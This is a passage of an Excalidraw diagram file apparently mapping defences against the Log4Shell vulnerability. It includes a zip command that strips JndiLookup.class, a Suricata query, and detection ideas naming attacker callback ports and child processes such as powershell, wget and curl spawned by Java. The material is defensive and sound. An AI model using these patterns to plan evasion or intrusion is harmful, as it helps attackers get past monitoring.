2980 | "containerId": null,
2981 | "originalText": "Remove the JNDILookup \nclass from classpath"
2982 | },
2983 | {
2984 | "id": "7eBvQNtmb47Bh8CPBsJEt",
2985 | "type": "text",
2986 | "x": 833.75,
2987 | "y": 450.1250000000001,
2988 | "width": 204.75000000000006,
2989 | "height": 41.53291814946616,
2990 | "angle": 0,
2991 | "strokeColor": "#000000",
2992 | "backgroundColor": "transparent",
2993 | "fillStyle": "hachure",
2994 | "strokeWidth": 1,
2995 | "strokeStyle": "dotted",
2996 | "roughness": 1,
2997 | "opacity": 100,
2998 | "groupIds": [],
2999 | "strokeSharpness": "sharp",
3000 | "seed": 138945472,
3001 | "version": 100,
3002 | "versionNonce": 2061454272,
3003 | "isDeleted": false,
3004 | "boundElements": null,
3005 | "updated": 1639775213778,
3006 | "text": "zip -q -d log4j-core-*.jar \norg/apache/logging/log4j/core/\nlookup/JndiLookup.class",
3007 | "fontSize": 11.658362989323836,
3008 | "fontFamily": 3,
3009 | "textAlign": "left",
3010 | "verticalAlign": "top",
3011 | "baseline": 38.53291814946616,
3012 | "containerId": null,
3013 | "originalText": "zip -q -d log4j-core-*.jar \norg/apache/logging/log4j/core/\nlookup/JndiLookup.class"
3014 | },
3015 | {
3016 | "id": "ZFfSYbAp2pZ_maI3Evhrb",
3017 | "type": "text",
3018 | "x": 1791.9308501859523,
3019 | "y": 737.5523974907978,
3020 | "width": 361,
3021 | "height": 32,
3022 | "angle": 0,
3023 | "strokeColor": "#000000",
3024 | "backgroundColor": "transparent",
3025 | "fillStyle": "hachure",
3026 | "strokeWidth": 1,
3027 | "strokeStyle": "dotted",
3028 | "roughness": 1,
3029 | "opacity": 100,
3030 | "groupIds": [],
3031 | "strokeSharpness": "sharp",
3032 | "seed": 77226944,
3033 | "version": 148,
3034 | "versionNonce": 1082119104,
3035 | "isDeleted": false,
3036 | "boundElements": null,
3037 | "updated": 1639775213778,
3038 | "text": "Detect outbound traffic fromj ava process to dest port \n1389, 389, 1099, 53, 5353",
3039 | "fontSize": 12.457351557190878,
3040 | "fontFamily": 1,
3041 | "textAlign": "left",
3042 | "verticalAlign": "top",
3043 | "baseline": 27,
3044 | "containerId": null,
3045 | "originalText": "Detect outbound traffic fromj ava process to dest port \n1389, 389, 1099, 53, 5353"
3046 | },
3047 | {
3048 | "type": "rectangle",
3049 | "version": 640,
3050 | "versionNonce": 1726498880,
3051 | "isDeleted": false,
3052 | "id": "RCHd0AVdqDFlQVSiK74gw",
3053 | "fillStyle": "solid",
3054 | "strokeWidth": 1,
3055 | "strokeStyle": "dotted",
3056 | "roughness": 1,
3057 | "opacity": 100,
3058 | "angle": 0,
3059 | "x": 1770.0983527632968,
3060 | "y": 783.1590214206569,
3061 | "strokeColor": "#000000",
3062 | "backgroundColor": "#ffffff",
3063 | "width": 375.2394234799217,
3064 | "height": 58.58486789667195,
3065 | "seed": 142461888,
3066 | "groupIds": [],
3067 | "strokeSharpness": "sharp",
3068 | "boundElements": [],
3069 | "updated": 1639775213778
3070 | },
3071 | {
3072 | "type": "text",
3073 | "version": 417,
3074 | "versionNonce": 282024896,
3075 | "isDeleted": false,
3076 | "id": "dWCkcYiUOkiyRiecxQ99r",
3077 | "fillStyle": "hachure",
3078 | "strokeWidth": 1,
3079 | "strokeStyle": "dotted",
3080 | "roughness": 1,
3081 | "opacity": 100,
3082 | "angle": 0,
3083 | "x": 1777.9710043003495,
3084 | "y": 792.2053082287841,
3085 | "strokeColor": "#000000",
3086 | "backgroundColor": "transparent",
3087 | "width": 362,
3088 | "height": 48,
3089 | "seed": 535154752,
3090 | "groupIds": [],
3091 | "strokeSharpness": "sharp",
3092 | "boundElements": [],
3093 | "updated": 1639775213778,
3094 | "fontSize": 12.457351557190883,
3095 | "fontFamily": 1,
3096 | "text": "Detect java[.exe] processes that spawn unusual child \nprocesses : cmd, powershell, perl, python, wget, curl, wscript\njscript",
3097 | "baseline": 43,
3098 | "textAlign": "left",
3099 | "verticalAlign": "top",
3100 | "containerId": null,
3101 | "originalText": "Detect java[.exe] processes that spawn unusual child \nprocesses : cmd, powershell, perl, python, wget, curl, wscript\njscript"
3102 | },
3103 | {
3104 | "type": "text",
3105 | "version": 500,
3106 | "versionNonce": 1260599360,
3107 | "isDeleted": false,
3108 | "id": "so4gtf0SpSiiwT9d5rv0Y",
3109 | "fillStyle": "hachure",
3110 | "strokeWidth": 1,
3111 | "strokeStyle": "dotted",
3112 | "roughness": 1,
3113 | "opacity": 100,
3114 | "angle": 0,
3115 | "x": 1792.7500000000002,
3116 | "y": 857.3750000000002,
3117 | "strokeColor": "#000000",
3118 | "backgroundColor": "transparent",
3119 | "width": 331,
3120 | "height": 16,
3121 | "seed": 1687366592,
3122 | "groupIds": [],
3123 | "strokeSharpness": "sharp",
3124 | "boundElements": [],
3125 | "updated": 1639775213779,
3126 | "fontSize": 12.457351557190883,
3127 | "fontFamily": 1,
3128 | "text": "Detect persistence in crontab or systemd [for Linux]",
3129 | "baseline": 11,
3130 | "textAlign": "left",
3131 | "verticalAlign": "top",
3132 | "containerId": null,
3133 | "originalText": "Detect persistence in crontab or systemd [for Linux]"
3134 | },
3135 | {
3136 | "id": "akgWC4bsmKgfXnpQTaveg",
3137 | "type": "rectangle",
3138 | "x": 1786.25,
3139 | "y": 851.3750000000002,
3140 | "width": 345,
3141 | "height": 27.5,
3142 | "angle": 0,
3143 | "strokeColor": "#000000",
3144 | "backgroundColor": "transparent",
3145 | "fillStyle": "hachure",
3146 | "strokeWidth": 1,
3147 | "strokeStyle": "dotted",
3148 | "roughness": 1,
3149 | "opacity": 100,
3150 | "groupIds": [],
3151 | "strokeSharpness": "sharp",
3152 | "seed": 1533481024,
3153 | "version": 39,
3154 | "versionNonce": 1442540480,
3155 | "isDeleted": false,
3156 | "boundElements": null,
3157 | "updated": 1639775213779
3158 | },
3159 | {
3160 | "id": "YaW6QgbWRY665ksTHQ764",
3161 | "type": "text",
3162 | "x": 1389.8987960523987,
3163 | "y": 328.8750000000001,
3164 | "width": 182.6012039476011,
3165 | "height": 54.78036118428033,
3166 | "angle": 0,
3167 | "strokeColor": "#000000",
3168 | "backgroundColor": "transparent",
3169 | "fillStyle": "hachure",
3170 | "strokeWidth": 1,
3171 | "strokeStyle": "dotted",
3172 | "roughness": 1,
3173 | "opacity": 100,
3174 | "groupIds": [],
3175 | "strokeSharpness": "sharp",
3176 | "seed": 1238558784,
3177 | "version": 102,
3178 | "versionNonce": 1031297088,
3179 | "isDeleted": false,
3180 | "boundElements": null,
3181 | "updated": 1639775361576,
3182 | "text": "suricata (\"2021-44228\" \nOR \"Log4j\" \nOR \"Log4Shell\")",
3183 | "fontSize": 14.608096315808089,
3184 | "fontFamily": 1,
3185 | "textAlign": "center",
3186 | "verticalAlign": "top",
3187 | "baseline": 49.78036118428033,
3188 | "containerId": null,
3189 | "originalText": "suricata (\"2021-44228\" \nOR \"Log4j\" \nOR \"Log4Shell\")"
3190 | },
3191 | {
3192 | "id": "PMsI0HnHx0ePi_wU74j3H",
3193 | "type": "text",
3194 | "x": 1832.5,
3195 | "y": 897.6250000000002,
3196 | "width": 252,
3197 | "height": 40,
3198 | "angle": 0,
3199 | "strokeColor": "#000000",
3200 | "backgroundColor": "transparent",
3201 | "fillStyle": "hachure",
3202 | "strokeWidth": 1,
3203 | "strokeStyle": "dotted",
3204 | "roughness": 1,
3205 | "opacity": 100,
3206 | "groupIds": [],
3207 | "strokeSharpness": "sharp",
3208 | "seed": 1482970048,
3209 | "version": 80,
3210 | "versionNonce": 828516416,
3211 | "isDeleted": false,
3212 | "boundElements": null,
3213 | "updated": 1639775213779,
3214 | "text": "Look for new outbound \nTraffic Detection from baseline",
3215 | "fontSize": 16,
3216 | "fontFamily": 1,
3217 | "textAlign": "left",
3218 | "verticalAlign": "top",
3219 | "baseline": 34,
3220 | "containerId": null,
3221 | "originalText": "Look for new outbound \nTraffic Detection from baseline"
3222 | },
3223 | {
3224 | "id": "x_hSYjY8PX--Z2rQawjN7",
3225 | "type": "rectangle",
3226 | "x": 1825,
3227 | "y": 890.1250000000002,
3228 | "width": 271.25,
3229 | "height": 53.75,
3230 | "angle": 0,
3231 | "strokeColor": "#000000",
3232 | "backgroundColor": "transparent",
3233 | "fillStyle": "hachure",
3234 | "strokeWidth": 1,
3235 | "strokeStyle": "dotted",
3236 | "roughness": 1,
3237 | "opacity": 100,
3238 | "groupIds": [],
3239 | "strokeSharpness": "sharp",
3240 | "seed": 777595840,
3241 | "version": 30,
3242 | "versionNonce": 727940032,
3243 | "isDeleted": false,
3244 | "boundElements": null,
3245 | "updated": 1639775213779
3246 | },
3247 | {
3248 | "type": "rectangle",
3249 | "version": 371,
3250 | "versionNonce": 1265836096,
3251 | "isDeleted": false,
3252 | "id": "dHfAplUlPNP594DD-TMyK",
3253 | "fillStyle": "solid",
3254 | "strokeWidth": 1,
3255 | "strokeStyle": "dotted",
3256 | "roughness": 1,
3257 | "opacity": 100,
3258 | "angle": 0,
3259 | "x": 868.8366557399083,
3260 | "y": 723.5061106826715,
3261 | "strokeColor": "#000000",
3262 | "backgroundColor": "#ffffff",
3263 | "width": 354.82668852018355,
3264 | "height": 76.98777863465737,
3265 | "seed": 19986496,
3266 | "groupIds": [],
3267 | "strokeSharpness": "sharp",
3268 | "boundElements": [],
3269 | "updated": 1639775213779
3270 | },
3271 | {
3272 | "id": "s2z_uX9WQ7Exg_WXqyDhr",
3273 | "type": "text",
3274 | "x": 886.25,
3275 | "y": 745.6250000000002,
3276 | "width": 322,
3277 | "height": 40,
3278 | "angle": 0,
3279 | "strokeColor": "#000000",
3280 | "backgroundColor": "transparent",
3281 | "fillStyle": "hachure",
3282 | "strokeWidth": 1,
3283 | "strokeStyle": "dotted",
3284 | "roughness": 1,
3285 | "opacity": 100,
3286 | "groupIds": [],
3287 | "strokeSharpness": "sharp",
3288 | "seed": 853504064,
3289 | "version": 104,
3290 | "versionNonce": 821953472,
3291 | "isDeleted": false,
3292 | "boundElements": null,
3293 | "updated": 1639775213779,
3294 | "text": "Can be leveraged to identify log4j-based\napplication and helps if no CMDB",
3295 | "fontSize": 16,
3296 | "fontFamily": 1,
3297 | "textAlign": "left",
3298 | "verticalAlign": "top",
3299 | "baseline": 34,
3300 | "containerId": null,
3301 | "originalText": "Can be leveraged to identify log4j-based\napplication and helps if no CMDB"
3302 | },
3303 | {
3304 | "type": "rectangle",
3305 | "version": 405,
3306 | "versionNonce": 1755650112,
3307 | "isDeleted": false,
3308 | "id": "-Ozi9eUxhh7KvRrf5G-e4",
3309 | "fillStyle": "solid",
3310 | "strokeWidth": 1,
3311 | "strokeStyle": "dotted",
3312 | "roughness": 1,
3313 | "opacity": 100,
3314 | "angle": 0,
3315 | "x": 871.3366557399083,
3316 | "y": 815.3811106826715,
3317 | "strokeColor": "#000000",
3318 | "backgroundColor": "#ffffff",
3319 | "width": 354.82668852018355,
3320 | "height": 56.987778634657374,
3321 | "seed": 2113665984,
3322 | "groupIds": [],
3323 | "strokeSharpness": "sharp",
3324 | "boundElements": [],
3325 | "updated": 1639775213780
3326 | },
3327 | {
3328 | "id": "R_9fF01m5daQzxKK1eVhF",
3329 | "type": "text",
3330 | "x": 886.25,
3331 | "y": 826.8750000000002,
3332 | "width": 329,
3333 | "height": 40,
3334 | "angle": 0,
3335 | "strokeColor": "#000000",
3336 | "backgroundColor": "transparent",
3337 | "fillStyle": "hachure",
3338 | "strokeWidth": 1,
3339 | "strokeStyle": "dotted",
3340 | "roughness": 1,
3341 | "opacity": 100,
3342 | "groupIds": [],
3343 | "strokeSharpness": "sharp",
3344 | "seed": 1756134336,
3345 | "version": 87,
3346 | "versionNonce": 2094534720,
3347 | "isDeleted": false,
3348 | "boundElements": null,
3349 | "updated": 1639775213780,
3350 | "text": "Can detect outbound traffic to malicious\nIP/FQDN",
3351 | "fontSize": 16,
3352 | "fontFamily": 1,
3353 | "textAlign": "left",
3354 | "verticalAlign": "top",
3355 | "baseline": 34,
3356 | "containerId": null,
3357 | "originalText": "Can detect outbound traffic to malicious\nIP/FQDN"
3358 | },
3359 | {
3360 | "type": "rectangle",
3361 | "version": 475,
3362 | "versionNonce": 1755321280,
3363 | "isDeleted": false,
3364 | "id": "08Hf1HvcjrHoSbzyzlorT",
3365 | "fillStyle": "solid",
3366 | "strokeWidth": 1,
3367 | "strokeStyle": "dotted",
3368 | "roughness": 1,
3369 | "opacity": 100,
3370 | "angle": 0,
3371 | "x": 872.5866557399083,
3372 | "y": 887.8811106826715,
3373 | "strokeColor": "#000000",
3374 | "backgroundColor": "#ffffff",
3375 | "width": 354.82668852018355,
3376 | "height": 45.737778634657396,
3377 | "seed": 630299584,
3378 | "groupIds": [],
3379 | "strokeSharpness": "sharp",
3380 | "boundElements": [],
3381 | "updated": 1639775213780
3382 | },
3383 | {
3384 | "id": "bv6uM1yKnaOTZDWrtoSPq",
3385 | "type": "text",
3386 | "x": 901.25,
3387 | "y": 893.1250000000002,
3388 | "width": 295,
3389 | "height": 40,
3390 | "angle": 0,
3391 | "strokeColor": "#000000",
3392 | "backgroundColor": "transparent",
3393 | "fillStyle": "hachure",
3394 | "strokeWidth": 1,
3395 | "strokeStyle": "dotted",
3396 | "roughness": 1,
3397 | "opacity": 100,
3398 | "groupIds": [],
3399 | "strokeSharpness": "sharp",
3400 | "seed": 189950016,
3401 | "version": 67,
3402 | "versionNonce": 2146175040,
3403 | "isDeleted": false,
3404 | "boundElements": null,
3405 | "updated": 1639775213780,
3406 | "text": "Identify strange parent/child process\ncombinations ",
3407 | "fontSize": 16,
3408 | "fontFamily": 1,
3409 | "textAlign": "left",
3410 | "verticalAlign": "top",
3411 | "baseline": 34,
3412 | "containerId": null,
3413 | "originalText": "Identify strange parent/child process\ncombinations "
3414 | },
3415 | {
3416 | "type": "rectangle",
3417 | "version": 513,
3418 | "versionNonce": 1256692672,
3419 | "isDeleted": false,
3420 | "id": "LR9FuQZxdC6MR0kdCm9_7",
3421 | "fillStyle": "solid",
3422 | "strokeWidth": 1,
3423 | "strokeStyle": "dotted",
3424 | "roughness": 1,
3425 | "opacity": 100,
3426 | "angle": 0,
3427 | "x": 872.5866557399083,
3428 | "y": 943.5061106826715,
3429 | "strokeColor": "#000000",
3430 | "backgroundColor": "#ffffff",
3431 | "width": 354.82668852018355,
3432 | "height": 45.737778634657396,
3433 | "seed": 1829479360,
3434 | "groupIds": [],
3435 | "strokeSharpness": "sharp",
3436 | "boundElements": [],
3437 | "updated": 1639775213780
3438 | },
3439 | {
3440 | "type": "text",
3441 | "version": 168,
3442 | "versionNonce": 1841365056,
3443 | "isDeleted": false,
3444 | "id": "XpbUDNp_g0nnSRg2As3d5",
3445 | "fillStyle": "hachure",
3446 | "strokeWidth": 1,
3447 | "strokeStyle": "dotted",
3448 | "roughness": 1,
3449 | "opacity": 100,
3450 | "angle": 0,
3451 | "x": 942.4999999999998,
3452 | "y": 957.5000000000002,
3453 | "strokeColor": "#000000",
3454 | "backgroundColor": "transparent",
3455 | "width": 222,
3456 | "height": 20,
3457 | "seed": 1975613504,
3458 | "groupIds": [],
3459 | "strokeSharpness": "sharp",
3460 | "boundElements": [],
3461 | "updated": 1639775213780,
3462 | "fontSize": 16,
3463 | "fontFamily": 1,
3464 | "text": "Hash-based binary detection",
3465 | "baseline": 14,
3466 | "textAlign": "left",
3467 | "verticalAlign": "top",
3468 | "containerId": null,
3469 | "originalText": "Hash-based binary detection"
3470 | },
3471 | {
3472 | "id": "z5thYEdzM93C3i67KZP8X",
3473 | "type": "rectangle",
3474 | "x": 115,
3475 | "y": 458.8750000000001,
3476 | "width": 466.25,
3477 | "height": 86.25,
3478 | "angle": 0,
3479 | "strokeColor": "#000000",
3480 | "backgroundColor": "#fa5252",
3481 | "fillStyle": "hachure",
3482 | "strokeWidth": 1,
3483 | "strokeStyle": "dotted",
3484 | "roughness": 1,
3485 | "opacity": 50,
3486 | "groupIds": [],
3487 | "strokeSharpness": "sharp",
3488 | "seed": 1294487616,
3489 | "version": 37,
3490 | "versionNonce": 184427456,
3491 | "isDeleted": false,
3492 | "boundElements": null,
3493 | "updated": 1639775213781
3494 | },
3495 | {
3496 | "type": "rectangle",
3497 | "version": 93,
3498 | "versionNonce": 1178007616,
3499 | "isDeleted": false,
3500 | "id": "fPZUE66z8bKAj7KvspHf5",
3501 | "fillStyle": "hachure",
3502 | "strokeWidth": 1,
3503 | "strokeStyle": "dotted",
3504 | "roughness": 1,
3505 | "opacity": 50,
3506 | "angle": 0,
3507 | "x": 110.625,
3508 | "y": 969.5000000000002,
3509 | "strokeColor": "#000000",
3510 | "backgroundColor": "#4c6ef5",
3511 | "width": 466.25,
3512 | "height": 86.25,
3513 | "seed": 467056704,
3514 | "groupIds": [],
3515 | "strokeSharpness": "sharp",
3516 | "boundElements": [],
3517 | "updated": 1639775213781
3518 | },
3519 | {
3520 | "type": "rectangle",
3521 | "version": 215,
3522 | "versionNonce": 1575828416,
3523 | "isDeleted": false,
3524 | "id": "i6gEl8WVGZgnHwgYRjvMr",
3525 | "fillStyle": "hachure",
3526 | "strokeWidth": 1,
3527 | "strokeStyle": "dotted",
3528 | "roughness": 1,
3529 | "opacity": 50,
3530 | "angle": 0,
3531 | "x": 810.625,
3532 | "y": 1008.2500000000002,
3533 | "strokeColor": "#000000",
3534 | "backgroundColor": "#15aabf",
3535 | "width": 236.24999999999994,
3536 | "height": 67.48999999999998,
3537 | "seed": 1040894016,
3538 | "groupIds": [],
3539 | "strokeSharpness": "sharp",
3540 | "boundElements": [],
3541 | "updated": 1639775230703
3542 | },
3543 | {
3544 | "type": "rectangle",
3545 | "version": 318,
3546 | "versionNonce": 1604032576,
3547 | "isDeleted": false,
3548 | "id": "RE7fp2Tpka791qUIwM--j",
3549 | "fillStyle": "hachure",
3550 | "strokeWidth": 1,
3551 | "strokeStyle": "dotted",
3552 | "roughness": 1,
3553 | "opacity": 50,
3554 | "angle": 0,
3555 | "x": 1076.875,
3556 | "y": 1005.1300000000003,
3557 | "strokeColor": "#000000",
3558 | "backgroundColor": "#7950f2",
3559 | "width": 218.09044616876818,
3560 | "height": 71.24000000000002,
3561 | "seed": 571336768,
3562 | "groupIds": [],
3563 | "strokeSharpness": "sharp",
3564 | "boundElements": [],
3565 | "updated": 1639775219978
3566 | },
3567 | {
3568 | "type": "rectangle",
3569 | "version": 547,
3570 | "versionNonce": 42095552,
3571 | "isDeleted": false,
3572 | "id": "t6rp2KpU3DtYjCtDzmd5w",
3573 | "fillStyle": "solid",
3574 | "strokeWidth": 1,
3575 | "strokeStyle": "dotted",
3576 | "roughness": 1,
3577 | "opacity": 100,
3578 | "angle": 0,
3579 | "x": 1353.8366557399079,
3580 | "y": 1051.0061106826715,
3581 | "strokeColor": "#000000",
3582 | "backgroundColor": "#ffffff",
3583 | "width": 354.82668852018355,
3584 | "height": 45.737778634657396,
3585 | "seed": 340744256,
3586 | "groupIds": [],
3587 | "strokeSharpness": "sharp",
3588 | "boundElements": [],
3589 | "updated": 1639775267483
3590 | },
3591 | {
3592 | "id": "-A6VUyd83Z5K-paNfiVcl",
3593 | "type": "text",
3594 | "x": 1376.25,
3595 | "y": 1055.6250000000002,
3596 | "width": 315,
3597 | "height": 40,
3598 | "angle": 0,
3599 | "strokeColor": "#000000",
3600 | "backgroundColor": "#7950f2",
3601 | "fillStyle": "hachure",
3602 | "strokeWidth": 1,
3603 | "strokeStyle": "dotted",
3604 | "roughness": 1,
3605 | "opacity": 100,
3606 | "groupIds": [],
3607 | "strokeSharpness": "sharp",
3608 | "seed": 1205472192,
3609 | "version": 101,
3610 | "versionNonce": 887077824,
3611 | "isDeleted": false,
3612 | "boundElements": null,
3613 | "updated": 1639775302961,
3614 | "text": "Leverage Sysmon for Windows or auditd\nfor Linux to enhance security telemetry",
3615 | "fontSize": 16,
3616 | "fontFamily": 1,
3617 | "textAlign": "left",
3618 | "verticalAlign": "top",
3619 | "baseline": 34,
3620 | "containerId": null,
3621 | "originalText": "Leverage Sysmon for Windows or auditd\nfor Linux to enhance security telemetry"
3622 | },
3623 | {
3624 | "type": "rectangle",
3625 | "version": 820,
3626 | "versionNonce": 923290560,
3627 | "isDeleted": false,
3628 | "id": "TCyHUYhvgLZ5PX1844rTg",
3629 | "fillStyle": "solid",
3630 | "strokeWidth": 1,
3631 | "strokeStyle": "dotted",
3632 | "roughness": 1,
3633 | "opacity": 100,
3634 | "angle": 0,
3635 | "x": 1388.836655739908,
3636 | "y": 329.10883059499804,
3637 | "strokeColor": "#000000",
3638 | "backgroundColor": "transparent",
3639 | "width": 182.44296952323896,
3640 | "height": 55.45395751895662,
3641 | "seed": 337731648,
3642 | "groupIds": [],
3643 | "strokeSharpness": "sharp",
3644 | "boundElements": [],
3645 | "updated": 1639775361576
3646 | }
3647 | ],
3648 | "appState": {
3649 | "gridSize": null,
3650 | "viewBackgroundColor": "#ffffff"
3651 | },
3652 | "files": {
3653 | "5fc454969dece69e77ad7ac5dd993b5ada247acb": {
3654 | "mimeType": "image/png",
3655 | "id": "5fc454969dece69e77ad7ac5dd993b5ada247acb",
3656 | "dataURL": "data:image/png;base64,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